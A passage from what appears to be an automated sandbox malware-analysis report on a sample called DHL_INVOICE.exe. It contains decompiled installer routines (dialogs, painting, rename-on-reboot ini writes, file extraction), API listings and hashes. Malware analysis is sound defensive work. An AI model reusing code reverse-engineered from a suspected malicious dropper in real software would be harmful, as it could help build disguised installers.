                                                                            					_t88 =  *0x435a38 + _t121 * 2;
                                                                            					_t89 =  &(_t88[1]);
                                                                            					 *(_t142 + 0x64) = _t89;
                                                                            					 *(_t142 + 0x14) = _t89;
                                                                            					_t91 =  ==  ? E0040568C : E00405655;
                                                                            					 *(_t142 + 0x68) =  *_t88 & 0x0000ffff;
                                                                            					_t137 =  *(_t142 + 0x60);
                                                                            					 *(_t142 + 0x18) = 0;
                                                                            					_push(0x22);
                                                                            					 *((intOrPtr*)(_t142 + 0x24)) =  ==  ? E0040568C : E00405655;
                                                                            					_t132 = ( !( *(_t126 + 0x14) >> 5) |  *(_t126 + 0x14)) & 1;
                                                                            					E0040551A(_t137);
                                                                            					_push( *((intOrPtr*)( *(_t142 + 0x68) + 0x38)));
                                                                            					_push(0x23);
                                                                            					E0040551A(_t137);
                                                                            					CheckDlgButton(_t137, (_t132 ^ 1) + 0x40a, 1);
                                                                            					EnableWindow( *0x42dd54, _t132);
                                                                            					_t138 = GetDlgItem(_t137, 0x3e8);
                                                                            					E00405503(_t138);
                                                                            					SendMessageW(_t138, 0x45b, 1, 0);
                                                                            					_t104 =  *( *0x435a10 + 0x68);
                                                                            					if(_t104 < 0) {
                                                                            						_t104 = GetSysColor( ~_t104);
                                                                            					}
                                                                            					SendMessageW(_t138, 0x443, 0, _t104);
                                                                            					SendMessageW(_t138, 0x445, 0, 0x4010000);
                                                                            					SendMessageW(_t138, 0x435, 0, lstrlenW( *(_t142 + 0x60)));
                                                                            					 *0x42dd5c = 0;
                                                                            					SendMessageW(_t138, 0x449,  *(_t142 + 0x68), _t142 + 0x10);
                                                                            					 *0x42dd5c = 0;
                                                                            					return 0;
                                                                            				}
                                                                            			}





















                                                                            0x00403d99
                                                                            0x00403ecc
                                                                            0x00403ed0
                                                                            0x00403f4a
                                                                            0x00404065
                                                                            0x00404067
                                                                            0x00404067
                                                                            0x0040406d
                                                                            0x00000000
                                                                            0x00404076
                                                                            0x00403f59
                                                                            0x00403f5f
                                                                            0x00403f64
                                                                            0x00403f6c
                                                                            0x00404013
                                                                            0x00404019
                                                                            0x00000000
                                                                            0x00404024
                                                                            0x00404024
                                                                            0x0040402a
                                                                            0x0040403a
                                                                            0x00404040
                                                                            0x00404040
                                                                            0x00404046
                                                                            0x00404052
                                                                            0x00404052
                                                                            0x00000000
                                                                            0x0040405a
                                                                            0x00404019
                                                                            0x00403f79
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403f7f
                                                                            0x00403f82
                                                                            0x00403f85
                                                                            0x00403f8b
                                                                            0x00403f8f
                                                                            0x00403f9c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403fae
                                                                            0x00403fc9
                                                                            0x00403fcf
                                                                            0x00403fd7
                                                                            0x00403fe0
                                                                            0x00403fe8
                                                                            0x00403ff0
                                                                            0x00403ff8
                                                                            0x00403ffc
                                                                            0x00404000
                                                                            0x0040400e
                                                                            0x00404010
                                                                            0x00000000
                                                                            0x00404010
                                                                            0x00403edc
                                                                            0x00403eef
                                                                            0x00403ef9
                                                                            0x00403f23
                                                                            0x00403f32
                                                                            0x00403f35
                                                                            0x00403f3b
                                                                            0x00403f3b
                                                                            0x00403ef9
                                                                            0x00000000
                                                                            0x00403d9f
                                                                            0x00403d9f
                                                                            0x00403da3
                                                                            0x00403da8
                                                                            0x00403db9
                                                                            0x00403db9
                                                                            0x00403dca
                                                                            0x00403dcd
                                                                            0x00403dd3
                                                                            0x00403dd6
                                                                            0x00403ddd
                                                                            0x00403de6
                                                                            0x00403de9
                                                                            0x00403ded
                                                                            0x00403df9
                                                                            0x00403e00
                                                                            0x00403e03
                                                                            0x00403e07
                                                                            0x00403e09
                                                                            0x00403e12
                                                                            0x00403e15
                                                                            0x00403e18
                                                                            0x00403e29
                                                                            0x00403e36
                                                                            0x00403e48
                                                                            0x00403e4b
                                                                            0x00403e5e
                                                                            0x00403e65
                                                                            0x00403e6a
                                                                            0x00403e6f
                                                                            0x00403e6f
                                                                            0x00403e7d
                                                                            0x00403e8b
                                                                            0x00403e9e
                                                                            0x00403ea4
                                                                            0x00403eb5
                                                                            0x00403eb7
                                                                            0x00000000
                                                                            0x00403ebd

                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,?,00000001), ref: 00403E29
                                                                            • EnableWindow.USER32(?), ref: 00403E36
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00403E42
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E5E
                                                                            • GetSysColor.USER32(?), ref: 00403E6F
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E7D
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E8B
                                                                            • lstrlenW.KERNEL32(?), ref: 00403E91
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E9E
                                                                            • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403EB5
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00403F11
                                                                            • SendMessageW.USER32(00000000), ref: 00403F18
                                                                            • EnableWindow.USER32(00000000), ref: 00403F35
                                                                            • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F59
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403FAE
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00403FC0
                                                                            • SetCursor.USER32(00000000), ref: 00403FC9
                                                                              • Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040400B
                                                                            • SetCursor.USER32(00000000), ref: 0040400E
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040403A
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404052
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                                                            • String ID: Call$N
                                                                            • API String ID: 3270077613-3438112850
                                                                            • Opcode ID: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
                                                                            • Instruction ID: c65a3a36bb4725451a4dfe1d630424e4f24f9f71ba4400fdcb13afcf6ca1fe0a
                                                                            • Opcode Fuzzy Hash: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
                                                                            • Instruction Fuzzy Hash: A3817DB0604305AFD710AF25DC84A6B7BA9FF84744F01493EF641B62A1C778AD45CF5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E00401000() {
                                                                            				struct HDC__* _t64;
                                                                            				void* _t82;
                                                                            				void* _t92;
                                                                            				struct HDC__* _t100;
                                                                            				struct tagRECT _t102;
                                                                            				long _t110;
                                                                            				struct HWND__* _t120;
                                                                            				void* _t126;
                                                                            				void* _t128;
                                                                            				intOrPtr _t131;
                                                                            				void* _t133;
                                                                            
                                                                            				if( *((intOrPtr*)(_t133 + 0x64)) == 0xf) {
                                                                            					_t131 =  *0x435a10;
                                                                            					_t64 = BeginPaint( *(_t133 + 0x74), _t133 + 0x24);
                                                                            					 *(_t133 + 0x10) =  *(_t133 + 0x10) & 0x00000000;
                                                                            					_t100 = _t64;
                                                                            					GetClientRect( *(_t133 + 0x74), _t133 + 0x1c);
                                                                            					_t120 =  *(_t133 + 0x28);
                                                                            					 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0x00000000;
                                                                            					_t102 =  *(_t133 + 0x20);
                                                                            					 *(_t133 + 0x74) = _t120;
                                                                            					while(_t102 < _t120) {
                                                                            						_t116 = _t120 - _t102;
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						 *(_t133 + 0x18) = (((( *(_t131 + 0x56) & 0x000000ff) * _t102 + ( *(_t131 + 0x52) & 0x000000ff) * (_t120 - _t102)) / _t120 & 0x000000ff) << 0x00000008 | (( *(_t131 + 0x55) & 0x000000ff) *  *(_t133 + 0x20) + ( *(_t131 + 0x51) & 0x000000ff) * _t116) /  *(_t133 + 0x74) & 0x000000ff) << 0x00000008 | (( *(_t131 + 0x54) & 0x000000ff) *  *(_t133 + 0x20) + ( *(_t131 + 0x50) & 0x000000ff) * _t116) /  *(_t133 + 0x74) & 0x000000ff;
                                                                            						_t82 = CreateBrushIndirect(_t133 + 0x10);
                                                                            						 *(_t133 + 0x28) =  *(_t133 + 0x28) + 4;
                                                                            						_t126 = _t82;
                                                                            						FillRect(_t100, _t133 + 0x20, _t126);
                                                                            						DeleteObject(_t126);
                                                                            						_t120 =  *(_t133 + 0x74);
                                                                            						_t102 =  *(_t133 + 0x20) + 4;
                                                                            						 *(_t133 + 0x20) = _t102;
                                                                            					}
                                                                            					if( *(_t131 + 0x58) != 0xffffffff) {
                                                                            						_t128 = CreateFontIndirectW( *(_t131 + 0x34));
                                                                            						 *(_t133 + 0x74) = _t128;
                                                                            						if(_t128 != 0) {
                                                                            							 *(_t133 + 0x24) = 0x10;
                                                                            							 *(_t133 + 0x28) = 8;
                                                                            							SetBkMode(_t100, 1);
                                                                            							SetTextColor(_t100,  *(_t131 + 0x58));
                                                                            							_t92 = SelectObject(_t100, _t128);
                                                                            							DrawTextW(_t100, 0x434a00, 0xffffffff, _t133 + 0x20, 0x820);
                                                                            							SelectObject(_t100, _t92);
                                                                            							DeleteObject( *(_t133 + 0x74));
                                                                            						}
                                                                            					}
                                                                            					EndPaint( *(_t133 + 0x74), _t133 + 0x2c);
                                                                            					return 0;
                                                                            				}
                                                                            				_t110 =  *(_t133 + 0x6c);
                                                                            				if( *((intOrPtr*)(_t133 + 0x64)) == 0x46) {
                                                                            					 *(_t110 + 0x18) =  *(_t110 + 0x18) | 0x00000010;
                                                                            					 *((intOrPtr*)(_t110 + 4)) =  *0x4349f8;
                                                                            				}
                                                                            				return DefWindowProcW( *(_t133 + 0x6c),  *(_t133 + 0x6c),  *(_t133 + 0x6c), _t110);
                                                                            			}














                                                                            0x00401008
                                                                            0x0040103b
                                                                            0x0040104c
                                                                            0x00401052
                                                                            0x00401057
                                                                            0x00401062
                                                                            0x00401068
                                                                            0x0040106c
                                                                            0x00401071
                                                                            0x00401075
                                                                            0x0040110f
                                                                            0x00401087
                                                                            0x00401096
                                                                            0x004010b1
                                                                            0x004010cc
                                                                            0x004010db
                                                                            0x004010df
                                                                            0x004010e5
                                                                            0x004010ea
                                                                            0x004010f3
                                                                            0x004010fa
                                                                            0x00401104
                                                                            0x00401108
                                                                            0x0040110b
                                                                            0x0040110b
                                                                            0x0040111b
                                                                            0x00401126
                                                                            0x00401128
                                                                            0x0040112e
                                                                            0x00401133
                                                                            0x0040113b
                                                                            0x00401143
                                                                            0x0040114d
                                                                            0x0040115b
                                                                            0x00401171
                                                                            0x00401179
                                                                            0x0040117f
                                                                            0x0040117f
                                                                            0x0040112e
                                                                            0x0040118e
                                                                            0x00000000
                                                                            0x00401199
                                                                            0x0040100f
                                                                            0x00401013
                                                                            0x00401015
                                                                            0x0040101e
                                                                            0x0040101e
                                                                            0x00000000

                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                                                            • BeginPaint.USER32(?,?), ref: 0040104C
                                                                            • GetClientRect.USER32(?,?), ref: 00401062
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                                                            • DeleteObject.GDI32(00000000), ref: 004010FA
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401120
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401143
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                                                            • DrawTextW.USER32(00000000,00434A00,000000FF,?,00000820), ref: 00401171
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                                                            • DeleteObject.GDI32(?), ref: 0040117F
                                                                            • EndPaint.USER32(?,?), ref: 0040118E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
                                                                            • Instruction ID: 3af209a9edb156689bef41e0a63d31b37659a4d6f6412c5d0cf3c0f243fc5647
                                                                            • Opcode Fuzzy Hash: c6345d7c5fceae9535b237699f25ce67e7fd4968e8456bbccafdc44fed7c7a8a
                                                                            • Instruction Fuzzy Hash: E041AFB20083509FC7159F65CD4496BBBE9FF88715F140A2EF995A22A1C734DD04CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E00406306() {
                                                                            				long _t10;
                                                                            				void* _t32;
                                                                            				void* _t36;
                                                                            				long _t37;
                                                                            				intOrPtr* _t39;
                                                                            				void* _t43;
                                                                            				WCHAR* _t44;
                                                                            				long _t46;
                                                                            				int _t48;
                                                                            				void* _t49;
                                                                            
                                                                            				_t44 =  *(_t49 + 0x14);
                                                                            				 *0x4319c0 = 0x55004e;
                                                                            				 *0x4319c4 = 0x4c;
                                                                            				if(_t44 == 0) {
                                                                            					L3:
                                                                            					_t10 = GetShortPathNameW( *(_t49 + 0x1c), 0x4311c0, 0x400);
                                                                            					if(_t10 != 0 && _t10 <= 0x400) {
                                                                            						_t48 = wsprintfA(0x430dc0, "%ls=%ls\r\n", 0x4319c0, 0x4311c0);
                                                                            						_push( *((intOrPtr*)( *0x435a10 + 0x128)));
                                                                            						_push(0x4311c0);
                                                                            						E00405EBA();
                                                                            						_t10 = E0040691B(0x4311c0, 0xc0000000, 4);
                                                                            						_t32 = _t10;
                                                                            						if(_t32 != 0xffffffff) {
                                                                            							_t46 = GetFileSize(_t32, 0);
                                                                            							_t4 = _t48 + 0xa; // 0xa
                                                                            							_t35 = _t4 + _t46;
                                                                            							_t43 = GlobalAlloc(0x40, _t4 + _t46);
                                                                            							if(_t43 != 0 && E00406948(_t35, _t32, _t43, _t46) != 0) {
                                                                            								if(E00406B36(_t43, "[Rename]\r\n") != 0) {
                                                                            									_t36 = E00406B36(_t16 + 0xa, "\n[");
                                                                            									if(_t36 == 0) {
                                                                            										goto L10;
                                                                            									} else {
                                                                            										_t39 = _t43 + _t46;
                                                                            										while(_t39 > _t36) {
                                                                            											 *((char*)(_t39 + _t48)) =  *_t39;
                                                                            											_t39 = _t39 - 1;
                                                                            										}
                                                                            										_t37 = _t36 - _t43 + 1;
                                                                            										goto L11;
                                                                            									}
                                                                            									goto L13;
                                                                            								} else {
                                                                            									lstrcpyA(_t43 + _t46, "[Rename]\r\n");
                                                                            									_t46 = _t46 + 0xa;
                                                                            									L10:
                                                                            									_t37 = _t46;
                                                                            								}
                                                                            								L11:
                                                                            								E004066B4(_t37 + _t43, 0x430dc0, _t48);
                                                                            								SetFilePointer(_t32, 0, 0, 0);
                                                                            								E00406A0B(_t37, _t32, _t43, _t46 + _t48);
                                                                            								GlobalFree(_t43);
                                                                            							}
                                                                            							_t10 = CloseHandle(_t32);
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					CloseHandle(E0040691B(_t44, 0, 1));
                                                                            					_t10 = GetShortPathNameW(_t44, 0x4319c0, 0x400);
                                                                            					if(_t10 != 0 && _t10 <= 0x400) {
                                                                            						goto L3;
                                                                            					}
                                                                            				}
                                                                            				L13:
                                                                            				return _t10;
                                                                            			}













                                                                            0x00406309
                                                                            0x00406312
                                                                            0x00406321
                                                                            0x00406334
                                                                            0x0040635c
                                                                            0x00406367
                                                                            0x0040636b
                                                                            0x00406394
                                                                            0x00406396
                                                                            0x0040639c
                                                                            0x0040639d
                                                                            0x004063aa
                                                                            0x004063af
                                                                            0x004063b4
                                                                            0x004063c3
                                                                            0x004063c5
                                                                            0x004063c8
                                                                            0x004063d3
                                                                            0x004063d7
                                                                            0x004063f2
                                                                            0x0040644f
                                                                            0x00406453
                                                                            0x00000000
                                                                            0x00406455
                                                                            0x00406455
                                                                            0x00406460
                                                                            0x0040645c
                                                                            0x0040645f
                                                                            0x0040645f
                                                                            0x00406466
                                                                            0x00000000
                                                                            0x00406466
                                                                            0x00000000
                                                                            0x004063f4
                                                                            0x004063fd
                                                                            0x00406403
                                                                            0x00406406
                                                                            0x00406406
                                                                            0x00406406
                                                                            0x00406408
                                                                            0x00406412
                                                                            0x0040641d
                                                                            0x00406429
                                                                            0x0040642f
                                                                            0x0040642f
                                                                            0x00406436
                                                                            0x00406436
                                                                            0x004063b4
                                                                            0x00406336
                                                                            0x00406341
                                                                            0x0040634a
                                                                            0x0040634e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040634e
                                                                            0x0040643c
                                                                            0x00406440

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,0040625E,?,?), ref: 00406341
                                                                            • GetShortPathNameW.KERNEL32(00000000,004319C0,00000400), ref: 0040634A
                                                                            • GetShortPathNameW.KERNEL32(?,004311C0,00000400), ref: 00406367
                                                                            • wsprintfA.USER32 ref: 00406385
                                                                            • GetFileSize.KERNEL32(00000000,00000000,004311C0,C0000000,00000004,004311C0,?), ref: 004063BD
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063CD
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063FD
                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00430DC0,00000000,-0000000A,00409984,00000000,[Rename],00000000,00000000,00000000), ref: 0040641D
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040642F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00406436
                                                                              • Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\DHL_INVOICE.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
                                                                              • Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2900126502-461813615
                                                                            • Opcode ID: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
                                                                            • Instruction ID: 3caf73f0ff98a748f1a35ad4b0faf92cdaa7f83aa24985268d6d9c0dc650f438
                                                                            • Opcode Fuzzy Hash: 0a571fe3ba45ea2247c21dd7af0bbb717ae824af8d2c55462ad76218f2181cd1
                                                                            • Instruction Fuzzy Hash: C93105B12012117AE7206B258D99FAB3A5CEF45748F16053AF903F62D3E63D9C11867C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                            			E00402BA3(intOrPtr __ebp, void* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16, long _a20, void* _a24, void* _a32, void* _a44, WCHAR* _a76) {
                                                                            				void* _v0;
                                                                            				void* _v4;
                                                                            				void* _v8;
                                                                            				void* _v16;
                                                                            				void* _v40;
                                                                            				long _t34;
                                                                            				WCHAR* _t46;
                                                                            				void* _t49;
                                                                            				void* _t50;
                                                                            				void* _t51;
                                                                            				void* _t52;
                                                                            				void* _t54;
                                                                            				void* _t55;
                                                                            				void* _t56;
                                                                            				void* _t58;
                                                                            				void _t59;
                                                                            				intOrPtr _t60;
                                                                            				void* _t62;
                                                                            
                                                                            				_t60 = __ebp;
                                                                            				_a24 = 0xfffffd66;
                                                                            				_t46 = E0040303E(_t51, 0xfffffff0);
                                                                            				_a76 = _t46;
                                                                            				if(E00406E03(_t46) == 0) {
                                                                            					E0040303E(__edx, 0xffffffed);
                                                                            				}
                                                                            				E00406B9D(_t46);
                                                                            				_t52 = E0040691B(_t46, 0x40000000, 2);
                                                                            				_a12 = _t52;
                                                                            				if(_t52 != 0xffffffff) {
                                                                            					_t31 = _a44;
                                                                            					 *(_t62 + 0x44) = _a44;
                                                                            					if( *(_t62 + 0x30) != _t60) {
                                                                            						_t34 =  *0x435a08;
                                                                            						_a20 = _t34;
                                                                            						_t58 = GlobalAlloc(0x40, _t34);
                                                                            						_a24 = _t58;
                                                                            						if(_t58 == 0) {
                                                                            							_t31 =  *(_t62 + 0x44);
                                                                            						} else {
                                                                            							E00403131(_t60);
                                                                            							E0040311B(_t58, _a16);
                                                                            							_t54 = GlobalAlloc(0x40,  *(_t62 + 0x30));
                                                                            							 *(_t62 + 0x44) = _t54;
                                                                            							if(_t54 != 0) {
                                                                            								E00403148(_a44, _t60, _t54,  *(_t62 + 0x30));
                                                                            								if( *_t54 != 0) {
                                                                            									_t49 = _t58;
                                                                            									do {
                                                                            										_t59 =  *_t54;
                                                                            										_t55 = _t54 + 8;
                                                                            										E004066B4( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t59);
                                                                            										_t54 = _t55 + _t59;
                                                                            									} while ( *_t54 != 0);
                                                                            									_t46 =  *(_t62 + 0x50);
                                                                            									_t58 = _a24;
                                                                            								}
                                                                            								GlobalFree( *(_t62 + 0x44));
                                                                            							}
                                                                            							_t52 =  *(_t62 + 0x20);
                                                                            							E00406A0B(_t50, _t52, _t58, _a20);
                                                                            							_t31 = GlobalFree(_t58) | 0xffffffff;
                                                                            						}
                                                                            					}
                                                                            					_a8 = E00403148(_t31, _t52, _t60, _t60);
                                                                            					CloseHandle(_t52);
                                                                            				}
                                                                            				_t56 = 0xfffffff3;
                                                                            				if(_a24 >= _t60) {
                                                                            					_t46 = _a16;
                                                                            				} else {
                                                                            					_t56 = 0xffffffef;
                                                                            					DeleteFileW(_t46);
                                                                            					_t46 = 1;
                                                                            				}
                                                                            				_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            				_push(_t56);
                                                                            				E00405D3A();
                                                                            				 *0x435ac8 =  *0x435ac8 + _t46;
                                                                            				return 0;
                                                                            			}





















                                                                            0x00402ba3
                                                                            0x00402ba5
                                                                            0x00402bb2
                                                                            0x00402bb5
                                                                            0x00402bc0
                                                                            0x00402bc4
                                                                            0x00402bc4
                                                                            0x00402bca
                                                                            0x00402bdc
                                                                            0x00402bde
                                                                            0x00402be5
                                                                            0x00402beb
                                                                            0x00402bef
                                                                            0x00402bf7
                                                                            0x00402bfd
                                                                            0x00402c05
                                                                            0x00402c0f
                                                                            0x00402c11
                                                                            0x00402c17
                                                                            0x00402c9f
                                                                            0x00402c1d
                                                                            0x00402c1e
                                                                            0x00402c28
                                                                            0x00402c39
                                                                            0x00402c3b
                                                                            0x00402c41
                                                                            0x00402c4d
                                                                            0x00402c55
                                                                            0x00402c57
                                                                            0x00402c59
                                                                            0x00402c59
                                                                            0x00402c5e
                                                                            0x00402c66
                                                                            0x00402c6b
                                                                            0x00402c6d
                                                                            0x00402c72
                                                                            0x00402c76
                                                                            0x00402c76
                                                                            0x00402c7e
                                                                            0x00402c7e
                                                                            0x00402c88
                                                                            0x00402c8e
                                                                            0x00402c9a
                                                                            0x00402c9a
                                                                            0x00402c17
                                                                            0x00402cad
                                                                            0x00402cb1
                                                                            0x00402cb1
                                                                            0x00402cb9
                                                                            0x00402cbe
                                                                            0x00402ccf
                                                                            0x00402cc0
                                                                            0x00402cc2
                                                                            0x00402cc4
                                                                            0x00402ccc
                                                                            0x00402ccc
                                                                            0x00402cd3
                                                                            0x00402cd8
                                                                            0x00402345
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                                                            • GlobalFree.KERNEL32(?), ref: 00402C7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                                                            • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll, xrefs: 00402CD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
